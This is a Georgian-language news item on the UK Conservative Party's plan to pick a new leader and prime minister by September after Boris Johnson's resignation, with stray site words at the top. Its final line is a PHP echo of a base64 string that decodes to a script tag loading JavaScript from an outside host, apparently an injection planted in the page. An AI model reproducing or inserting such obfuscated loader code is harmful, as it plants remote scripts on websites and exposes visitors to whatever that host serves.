celsiusi
ავერსი საქკაბელი
დიდი ბრიტანეთის კონსერვატიული პარტია ახალი ლიდერისა და პრემიერ-მინისტრის არჩევას სექტემბრის დასაწყისისთვის გეგმავს. ამის შესახებ ინფორმაციას გამოცემა „ფაინენშალ თაიმსი“ ავრცელებს. გამოცემა ეყრდნობა პარლამენტის წევრებს, რომლებიც პარტიის გეგმების შესახებ არიან ინფორმირებულები.
 
ბორის ჯონსონი, რომელმაც კონსერვატიული პარტიის თავმჯდომარის თანამდებობიდან გადადგომის შესახებ გუშინ განაცხადა, დიდი ბრიტანეთის პრემიერ-მინისტრის მოვალეობებს შეასრულებს ახალი ლიდერის არჩევამდე.
 
გადადგომის შესახებ ბორის ჯონსონის განცხადებამ დასაწყისი მისცა პარტიის ახალი ლიდერის არჩევის შიდა კონკურსს. შერჩევის გეგმა და ვადები ე.წ. 1922 წლის კომიტეტის სხდომაზე მომავალ კვირას დამტკიცდება.
 
რამდენიმე კანდიდატმა უკვე გამოთქვა სურვილი პრემიერ-მინისტრის პოსტზე კენჭისყრასთან დაკავშირებით. პირველი იყო გენერალური პროკურორი სუელა ბრეივერმანი. ამასთან, კონსერვატიული პარტიის დეპუტატმა, მინისტრთა კაბინეტის ყოფილმა წევრმა სტივ ბეიკერმა განაცხადა, რომ კოლეგებმა მას ლიდერის პოსტზე კენჭისყრა სთხოვეს, თუმცა მას ოფიციალურად კანდიდატურა ჯერ არ დაუყენებია.
508
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");